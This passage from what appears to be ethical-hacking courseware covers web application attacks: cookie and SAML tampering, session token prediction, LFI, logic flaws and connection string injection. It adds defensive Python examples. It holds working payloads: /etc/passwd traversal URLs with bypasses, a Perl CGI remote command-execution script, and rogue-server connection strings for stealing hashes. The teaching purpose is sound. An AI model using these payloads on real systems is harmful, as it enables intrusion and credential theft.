▪ Trap cookies using tools such as OWASP Zed Attack Proxy and Burp Suite.
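The remark above that encoding gives a false sense of security is easy to demonstrate, and so is the fix: a cookie whose value is authenticated with an HMAC can still be read, but any change to it is detected server-side. The following Python is an added example and not code from the courseware or from either tool named above; the key, the cookie values and the function names are constructed for the illustration.

```python
import base64
import codecs
import hashlib
import hmac
import secrets

# Constructed server-side key; in production it comes from configuration or a
# secrets manager, and it never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def encode_only(value: str) -> str:
    """'Protection' by Base64: anyone holding the cookie can reverse it."""
    return base64.b64encode(value.encode()).decode()


def decode_only(cookie: str) -> str:
    return base64.b64decode(cookie).decode()


def rot13(value: str) -> str:
    """ROT13 is its own inverse, so applying it twice returns the input."""
    return codecs.encode(value, "rot_13")


def sign_cookie(value: str, key: bytes = SERVER_KEY) -> str:
    """payload.mac: the payload is still readable, but it cannot be altered
    without the key because the MAC would no longer verify."""
    payload = base64.urlsafe_b64encode(value.encode()).decode()
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + mac


def verify_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the cookie value, or None when the MAC does not match."""
    try:
        payload, mac = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):     # constant-time comparison
        return None
    return base64.urlsafe_b64decode(payload).decode()


def modify_payload(cookie: str, old: str, new: str) -> str:
    """Edit the payload in place, as the poisoning steps above describe,
    keeping the original MAC; used here only to show that verification fails."""
    payload, mac = cookie.rsplit(".", 1)
    value = base64.urlsafe_b64decode(payload).decode().replace(old, new)
    return base64.urlsafe_b64encode(value.encode()).decode() + "." + mac


if __name__ == "__main__":
    weak = encode_only("uid=1001;role=user")
    print("decoded without any key:", decode_only(weak))
    signed = sign_cookie("uid=1001;role=user")
    print("verified:", verify_cookie(signed))
    print("tampered:", verify_cookie(modify_payload(signed, "role=user", "role=admin")))
```

Signing stops modification but not disclosure or replay: values that must stay secret still need encryption or, better, should live server-side behind an opaque random session ID with Secure and HttpOnly set.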
Cookie Exploitation Tools:
▪ OWASP Zed Attack Proxy
Source: https://www.owasp.org
OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
Figure 14.67: Screenshot of OWASP ZAP
Some additional cookie exploitation tools are as follows:
▪ L0phtCrack (https://www.l0phtcrack.com)
▪ Burp Suite (https://www.portswigger.net)
▪ xSSer (https://xsser.03c8.net)
Bypass Authentication: Bypass SAML-based SSO
The single sign-on (SSO) authentication process permits a user to sign in to an application using a single set of credentials, and the same login session can be used to access multiple applications irrespective of the domain or platform. For instance, when a user logs in using his/her Google account on a desktop or mobile device, he/she is automatically authenticated for other services such as Google Drive, YouTube, and Gmail. This authentication mechanism inside different applications is performed using the SAML protocol.
Security Assertion Markup Language (SAML) is an XML-based infrastructure that serves as an authorization and authentication medium between two peers, such as identity provider (IdP) and service provider (SP). The service provider entrusts the identity provider with validating users. Then, the identity provider responds with an SAML assertion (confirmation message) after validating any user.
Figure 14.65: Illustration of SAML-based SSO
Traditional applications can perform the authentication process before providing protected function access to the user. With the evolution of the SSO infrastructure, this authentication process has been handed over to third-party identity provider applications to access functions from the service provider application. Communication between these applications can be established through SAML messages. These SAML messages are encrypted using Base64 encoding. Attackers can easily decrypt these messages and read the content of the messages. Two major fields in SAML messages, signature and assertion, are susceptible to midway tampering. Signature is used to build a trust relationship between the SP and the IdP, and assertion is used to direct the SP on providing application services to the valid users.
Attackers can take advantage of signature misconfigurations, session expiry timeouts, session replays, misdirected SAML messages, etc., to bypass SAML-based SSO authentication and insert their own messages. Attackers use tools such as SAML Raider to bypass SAML-based SSO authentication. SAML Raider is a Burp Suite extension used for SAML infrastructure testing. It can be used to perform two core operations: modifying SAML messages and managing X.509 certificates.
Using SAML Raider
▪ Configure the browser to proceed with Burp Suite. Open Burp Suite with the new project and navigate to the ‘Proxy’ tab to ensure that the proxy is activated.
▪ In Burp Suite, first, go to the “Extender” tab and then go to “BApp store”, click and install the “SAML Raider” extension.
▪ Access Burp Suite and ensure that the “Proxy” tab displays “Intercept is on”. It enables Burp to find and tamper with requests directed to the servers. When the user's browser is pointed to the target (admin@xyz.org) website's secured registration page, Burp Suite indicates that the user is passed to the IdP system.
▪ SAML Raider displays a tab with the same name when there is SAML data that is to be decrypted. Users may need to pass a few more requests before they notice the “SAML Raider” tab with a request. Clicking on the “Forward” button can take the user to the IdP login page.
▪ Soon after the user enters the credentials for admin@xyx.org.fakedomain.com, Burp once again impedes some web requests. Until it shows the “SAML Raider” tab, keep clicking the “Forward” tab to pass them without modifications. Consequently, SAML responses from the IdP system can also be impeded.
▪ Going through the response can allow a user to find “NameID”. It is located below the key and signature tabs.
▪ Now, add your own comment between the two domain names and pass the response. In this case, as the signature is matching with valid messages, the SP approves and processes the first text parameter, admin@xyz.org, in NameID.
Figure 14.70: Screenshot of Burp Suite manipulating SAML response
Attackers use this technique to bypass the SAML-based SSO process and tamper with the responses.
Attack Authorization Schemes
Authorization Attack: Cookie Parameter Tampering
In an authorizationattack,the attackerfirstfindsa legitimate
account with limited privileges,
then logs i n as that user, and gradually escalatesprivilegesto access protected resources.
He/she then manipulates the HTTPrequests to subvertthe applicationauthorizationschemes
bymodifying inputfieldsrelatedto the user ID,username, access group, cost,file names,file
identifiers, etc. Attackers use sources such as uniformresource identifiers, parameter
tampering, POSTdata,HTTPheaders, query strings,cookies, and hidden tagsto perform
authorization attacks.
Uniform Resource Identifier: A uniform resource identifier (URI) provides a means to identify a resource. It is a global identifier for Internet resources accessed remotely or locally. An attacker may use URIs to access documents/directories that are protected from publishing, inject SQL queries or other unused commands into an application, and/or make a user view a certain site that is connected to another server.
Parameter Tampering: Parameter tampering involves the manipulation of parameters exchanged between the server and the client to modify the application data, such as the price and quantity of products, permissions, and user credentials. This information is usually stored in cookies, hidden form fields, or URL query strings, and attackers can use them to increase control over application functionality.
POST Data: POST data often comprises authorization and session information, as the information provided by the client must be associated with the session that provided it. The attacker can exploit vulnerabilities in the POST data and easily manipulate it.
HTTP Headers: Web browsers do not allow header modification. Therefore, to modify the header, the attacker has to write his/her own program and perform the HTTP request. He/she may also use available tools to modify any data sent from the browser. In general, an authorization HTTP header contains a username and password encoded in Base-64. The attacker can compromise the header by submitting two HTTP requests bound in the same header. The proxy system executes the first HTTP header and the target system executes the other HTTP header, allowing the attacker to bypass the proxy's access control.
Query String and Cookies: Browsers use cookies to maintain their state in the stateless HTTP protocol as well as to store user preferences, session tokens, and other data. Clients can modify the cookies and send them to the server with URL requests, thereby allowing the attacker to modify the cookie content. Cookie modification depends on the cookie usage, which ranges from session tokens to authorized decision-making arrays.
Hidden Tags: When a user selects anything on an HTML page, the selection is stored as a form field value and sent to the application as an HTTP request (GET or POST). HTML can store field values as hidden fields, which the browser does not render to the screen; instead, it collects and submits these fields as parameters during form submissions, which the user can manipulate. However, he/she has to make a choice. Code sent to browsers does not have any security value; therefore, by manipulating the hidden values, the attacker can easily access the page and run it in the browser.
Authorization Attack: HTTP Request Tampering
HTTP headers control information passed from web clients to web servers on HTTP requests and from web servers to web clients on HTTP responses. Each header consists of a single text line with a name and a value. There are two main ways to send data with HTTP: via the URL or the form. Tampering with HTTP data refers to modifying the data of the HTTP request (or response) before the recipient reads it. The attacker changes the HTTP request without using another user's ID.
Query String Tampering
If the query string is visible in the address bar in the browser, then try to change the string parameter to bypass authorization mechanisms. You can use web spidering tools such as Burp Suite to scan the web application for POST parameters.
Figure 14.71: Screenshot displaying Query String Tampering
HTTP Headers
If the application uses the Referer header for making access control decisions, then try to modify it to access protected application functionalities. In the example below, ItemID 201 is not accessible as the Admin parameter is set to false; you can change it to true and access protected items.
Authorization Attack: Cookie Parameter Tampering
Cookie parameter tampering is a method used to tamper with the cookies set by the web application to perform malicious attacks. When the user logs into the site, the web application sets the session cookie and stores it in the browser.
Cookie parameter tampering is performed in the following steps:
1. In the first step, collect some session cookies set by the web application and analyze them to determine the cookie generation mechanism
2. In the second step, trap the session cookie set by the web application, tamper its parameters using tools such as Burp Suite, and replay it to the application to gain unauthorized access to others' profiles
Burp Suite
Source: https://portswigger.net
The tool intercepts every request sent from the browser and allows you to edit the cookie to replace it with the tampered cookie parameters. If the cookie is not secure, you may be able to guess the parameters.
Figure 14.73: Screenshot of Burp Suite
Attack Access Controls
Exploiting Insecure Access Controls: access controls grant different levels of access (employees, managers, supervisors, CEOs, etc.), provide administrator functionality to configure and monitor the application, and may expose functionalities that allow escalating privileges.
Parameter-Based Access Control: Any web application consists of various request parameters such as cookies and query string parameters. The application determines the access granted to a request based on these parameters. These parameters vary between a normal user and an administrator. Sometimes, these parameters are invisible to normal users and visible only to administrators. If an attacker can identify the parameters that are assigned to an administrator, he/she can set those parameters in their own requests and gain access to administrative functions.
Referer-Based Access Control: In some web applications, the HTTP Referer is the foundation for major access control decisions. The HTTP Referer is considered unsafe; the attacker can use it and manipulate it to any value.
Location-Based Access Control: The user's geographic location can be determined using various methods. The most common method to determine the current location is through the IP address. Attackers can bypass location-based access controls using a web proxy, a VPN, a data-roaming-enabled mobile device, or direct manipulation of client-side mechanisms.
Access Controls Attack Methods
Attack with different user accounts: Attempt to access the application with different user accounts. If there is any broken access control in the web application, it allows you to access the resources and functionality as a legitimate user. You can use tools such as Burp Suite to access and compare two different user contexts.
Attack Multistage Processes: The abovementioned technique will be ineffective if there is a multistage process established in the web application architecture. In this multistage process, the user will perform multiple entries at multiple levels to complete the intended process. In a multistage process, multiple requests will be sent to the server from the client. To attack such a process, each and every request to the server should be captured and tested for access controls. Another way to attack a multistage process manually is to walk through a protected multistage process several times in your browser and use proxy tools to switch the session token supplied in different requests to that of a less privileged user.
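The parameter-based (Admin=true on ItemID 201) and Referer-based access control weaknesses above, as an added example that is not code from the original page: the two flawed policy functions trust request data, the hardened one reads the role from a server-side session, and a detection helper flags requests whose claimed privilege the session does not back. The request model, session store and admin URL are constructed assumptions.

```python
from dataclasses import dataclass, field


# Constructed model of an HTTP request (not from the original page).
@dataclass
class Request:
    query: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    session_id: str = ""


# Constructed server-side session store: the only trustworthy source of a role.
SESSIONS = {
    "sess-alice": {"user": "alice", "role": "user"},
    "sess-root": {"user": "root", "role": "admin"},
}
PROTECTED_ITEMS = {201}                     # ItemID 201 from the example above
ADMIN_UI = "https://shop.example/admin/"    # hypothetical admin area URL


def parameter_based_allow(req):
    """Flawed check: trusts the client-supplied Admin parameter."""
    return req.query.get("Admin", "false").lower() == "true"


def referer_based_allow(req):
    """Flawed check: treats the Referer header as proof of coming from the admin UI."""
    return req.headers.get("Referer", "").startswith(ADMIN_UI)


def session_based_allow(req):
    """Hardened check: the role comes from the server-side session, never the request."""
    sess = SESSIONS.get(req.session_id)
    return sess is not None and sess["role"] == "admin"


def can_view_item(req, allow=session_based_allow):
    """Authorize access to the requested ItemID with the given policy function."""
    item_id = int(req.query.get("ItemID", "0"))
    if item_id not in PROTECTED_ITEMS:
        return True
    return allow(req)


def tampering_indicators(req):
    """Detection: the client asserts a privilege the server-side session lacks."""
    findings = []
    sess = SESSIONS.get(req.session_id, {"role": "anonymous"})
    if req.query.get("Admin", "").lower() == "true" and sess["role"] != "admin":
        findings.append("Admin=true supplied by non-admin session")
    if req.headers.get("Referer", "").startswith(ADMIN_UI) and sess["role"] != "admin":
        findings.append("admin Referer supplied by non-admin session")
    return findings
```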
Attack Session Management Mechanism
Web application session management involves exchanging sensitive information between the server and its clients wherever required. If such session management is insecure, the attacker can take advantage of it to attack the web application through the session management mechanism, which is the key security component in most web applications. Nowadays, a session management attack is a method used by most attackers to compromise a web application.
Attackers break an application's session management mechanism to bypass the authentication controls and impersonate privileged application users. It involves two stages: session token generation and exploitation of session token handling. To generate a valid session token, attackers engage in the following:
Session Token Prediction
Weak Encoding Example
Once attackers generate a valid session token, they try to exploit session token handling as follows:
Man-in-the-Middle (MITM) Attack: Attackers intercept communication between two systems on a network. They divide the network connection into two: one between the client and the attacker, and the other between the attacker and the server, which then acts as a proxy in the intercepted connection.
Session Hijacking: Attackers steal the user session ID from a trusted website to perform malicious activities.
Session Replay: Attackers obtain the user session ID and then reuse it to gain access to the user account.
Attacking Session Token Generation Mechanism
To determine the session token generation mechanism in a session management attack, attackers steal valid session tokens and then predict the next session token. Through session prediction, attackers identify a pattern in the session token exchanged between the client and the server. This can happen when the web application has weak, predictable session identifiers. For example, when the web application assigns a session token sequentially, attackers can predict the previous and next session tokens by knowing any session ID. Before predicting a session identifier, attackers have to obtain sufficient valid session tokens for legitimate system users.
Weak Encoding Example
When hex encoding an ASCII string user=jason;app=admin;date=08/01/2020, you can predict another session token by just changing the date and use it for another transaction with the server.
https://www.certifiedhacker.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%30%38%2F%30%31%2F%32%30%32%30
Session Token Prediction
Obtain valid session tokens by sniffing the traffic or legitimately logging into the application and analyzing it for any encoding (hex encoding or Base64) pattern
If any meaning can be reverse engineered from the sample of session tokens, then attempt to guess the tokens recently issued to other application users
Make a large number of requests with predicted tokens to a session-dependent page to determine a valid session token
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
First, sniff network traffic for valid session tokens and then use them to predict the next session token. Use the predicted session ID to authenticate with the target web application. The steps for session token sniffing are as follows:
Sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp Suite
If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set, then try to replay the cookie to gain unauthorized access to the application
Use session cookies to perform session hijacking, session replay, and MITM attacks
Thus, sniffing the valid session token is important in session management attacks.
Wireshark
Source: https://www.wireshark.org
Wireshark is a network protocol analyzer that allows attackers to capture and interactively browse network traffic. Wireshark captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks, thus helping attackers sniff session IDs in transit to and from a target web application.
Screenshot of Wireshark capturing HTTP traffic (POST /index.aspx with a Cookie header)
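The weak encoding example and the Secure-flag point from the sniffing steps, combined in one added example that is not code from the original page: it percent-decodes a session cookie's value to show when the token is readable key=value text (the user/app/date fields an attacker could vary) and reports which of the Secure, HttpOnly and SameSite attributes are missing. The two Set-Cookie headers are constructed samples; the first carries the page's own hex-encoded token.

```python
import string
from urllib.parse import unquote

# Constructed Set-Cookie header carrying the hex-encoded token from the weak
# encoding example above (Secure/HttpOnly absent, as in the sniffing scenario).
WEAK_SET_COOKIE = (
    "SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E"
    "%3B%64%61%74%65%3D%30%38%2F%30%31%2F%32%30%32%30; Path=/"
)
# Constructed comparison: an opaque random token with the recommended attributes.
STRONG_SET_COOKIE = (
    "SessionToken=Zk3q9vT1mW8bR2xL0pHn7sYd4cJu6eQa; Path=/; Secure; HttpOnly; "
    "SameSite=Strict"
)


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.lower()] = val
    return name, value, attrs


def decode_token(value):
    """Percent-decode the token and, if it is readable key=value text, return
    the fields an attacker could learn to vary (user, app, date, ...)."""
    decoded = unquote(value)
    readable = all(ch in string.printable for ch in decoded)
    fields = {}
    if readable and "=" in decoded:
        for item in filter(None, decoded.split(";")):
            key, _, val = item.partition("=")
            fields[key.strip()] = val.strip()
    return decoded, fields


def audit_set_cookie(header):
    """Findings for a session cookie: predictable content and missing flags."""
    _, value, attrs = parse_set_cookie(header)
    _, fields = decode_token(value)
    findings = []
    if fields:
        findings.append("token decodes to structured data: " + ", ".join(sorted(fields)))
    for flag in ("secure", "httponly", "samesite"):
        if flag not in attrs:
            findings.append("missing %s attribute" % flag)
    return findings
```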
Perform Injection/Input Validation Attacks
Injection attacks are very common in web applications. They exploit the vulnerable input validation mechanism implemented by the web application. There are many types of injection attacks, such as web script injection, OS command injection, SMTP injection, LDAP injection, and XPath injection. Another frequently occurring attack is an SQL injection attack.
Injection takes place when a browser sends user-provided data to the interpreter as part of a command or query. For launching an injection attack, attackers supply crafted data that tricks the interpreter into executing unintended commands or queries. Because of these injection flaws, attackers can easily read, create, update, and remove any arbitrary data available to the application. In some cases, attackers can even bypass a deeply nested firewall environment and take complete control of the application and its underlying system.
Injection Attacks/Input Validation Attacks
To perform injection attacks, supply crafted malicious input that is syntactically correct according to the interpreted language being used to break the application's normal intended operation. Some ways to perform injection attacks are described below:
Web Scripts Injection: If the user input is used to dynamically execute code, enter crafted input that breaks the intended data context and executes commands on the server
OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command
SMTP Injection: Inject arbitrary SMTP commands into applications and SMTP server conversations to generate large volumes of spam email
SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases.
XPath Injection: Enter malicious strings in input fields to manipulate the XPath query so that it interferes with the application's logic.
Buffer Overflow: Inject a large amount of bogus data beyond the capacity of the input field
File Injection: Inject malicious files by exploiting "dynamic file include" mechanisms in web applications.
Canonicalization: Manipulate variables that reference files with "dot-dot-slash (../)" to access restricted directories in the application
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15 SQL Injection
Perform Local File Inclusion (LFI)
Local file inclusion (LFI) vulnerability enables attackers to add their own files on a server via a web browser. Such vulnerability arises when an application adds files without proper validation of inputs, thereby enabling the attacker to modify the input and embed path traversal characters.
LFI vulnerability is often triggered in PHP-based websites. Simple PHP code susceptible to LFI is given below. Attackers can insert the URL parameter into require() without proper validation.
$file = $_GET['page'];
require($file);
In general, .php and other extensions are added to the file name by the code as follows:
$file = $_GET['page'];
require($file . ".php");
Now, .php is appended to the file name, which means the user cannot find the required file because the file /etc/passwd.php does not exist. If an attacker tries to insert a null byte (%00) at the end of the attack string, the .php can be easily evaded:
http://xyz.com/page=../../../../../../etc/passwd%00
Another method to evade the added .php is to add a question mark (?) to the attack string:
http://xyz.com/page=../../../../../../etc/passwd?
Bypassing .php execution
LFI vulnerability can read .txt files but not .php files because they are executed by the server and their .php file ending comprises some code. This can be evaded using a built-in php filter as follows:
http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=index
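The include logic above, modelled in Python as an added example (the page's code is PHP; this is not the page's or any project's code): the vulnerable resolver mirrors require($file . ".php") and is run against the three payload shapes from the text, while the hardened resolver allow-lists the page name and confirms the final path stays inside the document root. The document root and allow-list are constructed assumptions.

```python
import os
from urllib.parse import unquote

# Constructed document root and page allow-list (not from the original page).
WEB_ROOT = os.path.realpath("/var/www/app")
ALLOWED_PAGES = {"index", "about", "contact"}


def vulnerable_resolve(page_param):
    """Python model of require($file . ".php"): the parameter is concatenated
    into the path unchecked, so traversal sequences walk out of WEB_ROOT."""
    return os.path.normpath(os.path.join(WEB_ROOT, page_param + ".php"))


def escapes_root(path):
    """True when the normalized path lies outside WEB_ROOT (pure string check)."""
    return os.path.commonpath([WEB_ROOT, os.path.normpath(path)]) != WEB_ROOT


def hardened_resolve(page_param):
    """Allow-list the page name, then confirm the final path is still inside
    WEB_ROOT. Null bytes, '?', traversal and php:// wrappers all fail the
    first test because none of them is a plain allow-listed name."""
    if page_param not in ALLOWED_PAGES:
        raise ValueError("page not in allow-list: %r" % page_param)
    candidate = os.path.normpath(os.path.join(WEB_ROOT, page_param + ".php"))
    if escapes_root(candidate):
        raise ValueError("resolved path leaves the web root")
    return candidate


# The three payload shapes from the text, as they would arrive in ?page=
PAYLOADS = [
    unquote("../../../../../../etc/passwd%00"),
    "../../../../../../etc/passwd?",
    "php://filter/convert.base64-encode/resource=index",
]


def audit(param):
    """Return (vulnerable_path, escapes_root, hardened_accepts) for one value."""
    path = vulnerable_resolve(param)
    try:
        hardened_resolve(param)
        accepted = True
    except ValueError:
        accepted = False
    return path, escapes_root(path), accepted
```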
Attack Application Logic Flaws
In all web applications, a vast amount of logic is applied at every level. The implementation of some logic can be vulnerable to various attacks that will not be noticeable. Most attackers mainly focus on high-level attacks such as SQL injection and XSS, since they have easily recognizable signatures. By contrast, application logic flaws are not associated with any common signatures, making them more difficult to identify. Vulnerability scanners cannot identify this type of flaw, which requires manual testing, and attackers exploit such flaws to cause severe damage to web applications.
Most application flaws arise from the negligence and false assumptions of developers. Application logic flaws vary among different types of web applications and are not restricted to a particular flaw. Acquiring knowledge of previously exploited applications with common logic flaws can provide appropriate information on how to approach exploiting flaws in application logic.
A common scenario illustrating the exploitation of application logic flaws by attackers is described below:
Scenario: Identify and exploit logic flaws in retail web applications
In most retail web applications, the process of placing an order includes selecting the product, finalizing the order, providing payment details, and providing delivery details. The developer assumes that any customer would follow all the levels in a sequence as designed. Identify such applications, and using proxy tools such as Burp Suite, attempt to control the requests sent to the web application. Furthermore, attempt to bypass the third stage, i.e., jump from the second stage to the fourth stage by manipulating the requests. This type of attack is called forced browsing. This flaw enables the attacker to avoid paying the product price and receive the product at the delivery address. It can result in severe financial losses if an attacker intends to exploit it on a large scale.
Figure 14.75: Screenshot displaying web application logic flaw exploitation
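The four-stage retail scenario above, as an added example that is not code from the original page: a naive order object reflects the developer's assumption that endpoints are called in sequence, so skipping from stage 2 to stage 4 dispatches an unpaid order, while a server-side state machine makes each stage verify the preceding one. Prices and SKUs are constructed.

```python
from enum import Enum


class Stage(Enum):
    SELECT_PRODUCT = 1
    FINALIZE_ORDER = 2
    PAYMENT = 3
    DELIVERY = 4
    COMPLETE = 5


class NaiveOrder:
    """Models the developer's assumption: each endpoint trusts that the earlier
    ones already ran, so requests may arrive in any order."""

    def __init__(self):
        self.items, self.paid, self.address = [], False, None

    def select_product(self, sku):
        self.items.append(sku)

    def finalize(self):
        self.total = 10.0 * len(self.items)   # constructed flat price per item

    def pay(self, card):
        self.paid = True

    def deliver(self, address):
        self.address = address                # never checks that pay() ran
        return "dispatched"


class CheckedOrder:
    """Server-side state machine: every step verifies the order is at the
    stage that precedes it, so stage 3 cannot be skipped."""

    def __init__(self):
        self.stage = Stage.SELECT_PRODUCT
        self.items, self.paid, self.address = [], False, None

    def _advance(self, expected, nxt):
        if self.stage is not expected:
            raise PermissionError("%s requested while order is at %s"
                                  % (nxt.name, self.stage.name))
        self.stage = nxt

    def select_product(self, sku):
        self._advance(Stage.SELECT_PRODUCT, Stage.FINALIZE_ORDER)
        self.items.append(sku)

    def finalize(self):
        self._advance(Stage.FINALIZE_ORDER, Stage.PAYMENT)
        self.total = 10.0 * len(self.items)

    def pay(self, card):
        self._advance(Stage.PAYMENT, Stage.DELIVERY)
        self.paid = True

    def deliver(self, address):
        self._advance(Stage.DELIVERY, Stage.COMPLETE)
        if not self.paid:                     # defence in depth on the invariant
            raise PermissionError("delivery requested for unpaid order")
        self.address = address
        return "dispatched"


def forced_browsing(order_cls):
    """Replay the scenario: stage 1, stage 2, then jump straight to stage 4.
    Returns (dispatched, paid) so the two models can be compared."""
    order = order_cls()
    order.select_product("SKU-1")
    order.finalize()
    try:
        dispatched = order.deliver("1 Example Street") == "dispatched"
    except PermissionError:
        dispatched = False
    return dispatched, order.paid
```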
Attack Shared Environments
For example, a malicious client of the application service provider may deploy a vulnerable web application that exposes the security of other organizations and compromises their web applications.
Attacks between applications
Vulnerabilities existing in one web application may allow attackers to execute malicious scripts and compromise the security of other hosted web applications. For example, the following script allows attackers to execute commands remotely:
#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html("");
if (param()) {
    # Runs whatever arrives in the cmd parameter: the remote command execution flaw
    my $command = param("cmd");
    $command = `$command`;
    print "$command\n";
} else {
    print start_form(), textfield("cmd");
}
print end_html;
Attack Database Connectivity
Database connection strings are used to connect applications to database engines. In these attacks, attackers target a database connection that forms a link between a database server and its client software. A web application establishes a connection with the database by providing a driver with a connection string that holds the address of a specific database or server instance and offers user authentication credentials. For example:
Server=sql_box; Database=Common; User ID=uid; Pwd=password
Attacking data connectivity can result in unauthorized control over the database. Attacks on data connectivity provide attackers with access to sensitive database information. Database connectivity attacks exploit the way in which applications connect to the database instead of abusing database queries. For this purpose, use methods such as connection string injection attack, hash stealing, port scanning, and hijacking web credentials.
The following is an example of a common connection string used to connect to a Microsoft SQL Server database:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Data connectivity attacks are of the following types:
Connection String Injection: In a delegated authentication environment, attackers inject parameters in a connection string by appending them with a semicolon. This can occur when dynamic string concatenation is used to build connection strings according to the user input.
Connection String Parameter Pollution (CSPP) Attacks: Attackers overwrite parameter values in the connection string.
Connection Pool DoS: Attackers examine the connection pooling settings of the target application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all the connections in the connection pool, causing database queries to fail for legitimate users.
Connection String Injection
A connection string injection attack occurs when the server uses dynamic string concatenation to build connection strings based on the user input. If the server does not validate the string and does not escape malicious text or characters, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The attacker relies on the connection string being parsed with the "last one wins" algorithm and substitutes a legitimate value with a hostile input.
The connection string builder classes can eliminate guesswork and protect the server from syntax errors and security vulnerabilities. They provide methods and properties corresponding to known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate a synonym into the corresponding well-known key name. The server checks for valid key/value pairs and an invalid pair throws an exception. In addition, it handles the injected values in a safe manner.
Attackers can easily inject parameters by simply adding a semicolon (";") using connection string injection techniques in a delegated authentication environment. In the following example, the system asks the user to give a username and password for creating a connection string. Here, the attacker enters the password as "pwd; Encryption=off"; this means that the attacker has voided the encryption system. When the connection string is populated, the encryption value will be added to the previously configured set of parameters.
Connection String Parameter Pollution (CSPP) Attacks
The server uses connection strings to connect applications to database engines. Connection string parameter pollution (CSPP) techniques allow an attacker to specifically exploit the semicolon-delimited database connection strings that are constructed dynamically based on the user inputs from web applications. In CSPP attacks, attackers overwrite parameter values in the connection string to steal user IDs and hijack web credentials.
Hash Stealing
Replaces the value of the Data Source parameter with that of a rogue Microsoft SQL Server and sets the values of username, data source, and integrated security as follows:
User_Value: ; Data Source = Rogue Server
Password_Value: ; Integrated Security = true
Thus, the resulting connection string would be:
Data source = myServer; initial catalog = dbl; integrated security=no; user id=; Data Source = Rogue Server; Password=; Integrated Security=true;
Here, the parameters "Data Source" and "Integrated Security" are overwritten. Thus, the application's built-in drivers will use the last set of values instead of the previous ones. Now, when the Microsoft SQL Server tries to connect to the rogue server, the sniffer running in the rogue server sniffs the Windows credentials.
Port Scanning
The resulting connection string would be:
Data source = myServer; initial catalog = dbl; integrated security=no; user id=; Data Source=Target Server, Target Port; Password=; Integrated Security=true;
Hijacking Web Credentials
Try to connect to the database using the web application system account instead of a user-provided set of credentials.
Inject
User_Value: ; Data Source=Target_server
Password_Value: ; Integrated Security=true
The resulting connection string is:
Data source = myServer; initial catalog = dbl; integrated security=no; user id=; Data Source=Target Server, Target Port; Password=; Integrated Security=true;
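The connection string injection ("pwd; Encryption=off") and the CSPP hash-stealing values above, as one added example that is not code from the original page: a parser with the "last one wins" rule shows what the driver would actually use after naive concatenation, and a builder-style constructor that quotes values (as the builder classes described above do) keeps the injected text inside the Password value. Server and catalog names are constructed.

```python
def parse_connection_string(cs):
    """Parse key=value pairs the way ADO.NET providers do: keys are
    case-insensitive, quoted values may contain ';', and when a key repeats
    the last occurrence wins (the behaviour the attacks above rely on)."""
    params = {}
    i, n = 0, len(cs)
    while i < n:
        eq = cs.find("=", i)
        if eq < 0:
            break
        key = cs[i:eq].strip().lower()
        i = eq + 1
        while i < n and cs[i] == " ":
            i += 1
        if i < n and cs[i] in "\"'":
            quote, i, buf = cs[i], i + 1, []
            while i < n:
                if cs[i] == quote:
                    if i + 1 < n and cs[i + 1] == quote:   # doubled quote = literal
                        buf.append(quote)
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(cs[i])
                i += 1
            value = "".join(buf)
            semi = cs.find(";", i)
            i = n if semi < 0 else semi + 1
        else:
            semi = cs.find(";", i)
            if semi < 0:
                semi = n
            value = cs[i:semi].strip()
            i = semi + 1
        if key:
            params[key] = value
    return params


def quote_value(value):
    """Quote the way the builder classes do: wrap a value containing delimiters
    or leading/trailing blanks in double quotes and double any embedded quote."""
    if any(ch in value for ch in ";=\"'") or value != value.strip():
        return '"' + value.replace('"', '""') + '"'
    return value


def build_naive(data_source, catalog, user, password):
    """Dynamic concatenation as described in the text: no escaping at all."""
    return ("Data Source=%s; Initial Catalog=%s; Integrated Security=no; "
            "User ID=%s; Password=%s;" % (data_source, catalog, user, password))


def build_safe(data_source, catalog, user, password):
    """Builder-style construction: every value passes through quote_value()."""
    pairs = [("Data Source", data_source), ("Initial Catalog", catalog),
             ("Integrated Security", "no"), ("User ID", user), ("Password", password)]
    return "; ".join("%s=%s" % (k, quote_value(v)) for k, v in pairs) + ";"


# Constructed inputs reproducing the two injections discussed in the text.
ENCRYPTION_OFF_PASSWORD = "pwd; Encryption=off"
HASH_STEALING_USER = "; Data Source = Rogue Server"
HASH_STEALING_PASSWORD = "; Integrated Security = true"


def effective_params(builder, user, password):
    """Build with the given builder and return what the driver would use."""
    return parse_connection_string(builder("myServer", "dbl", user, password))
```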
Attack Web Application Client
Interact with server-side applications in unexpected ways to perform malicious actions against the end users and access unauthorized data: cross-site scripting, redirection attacks, HTTP header injection, frame injection, request forgery attacks, session fixation, ActiveX attacks, and privacy attacks.
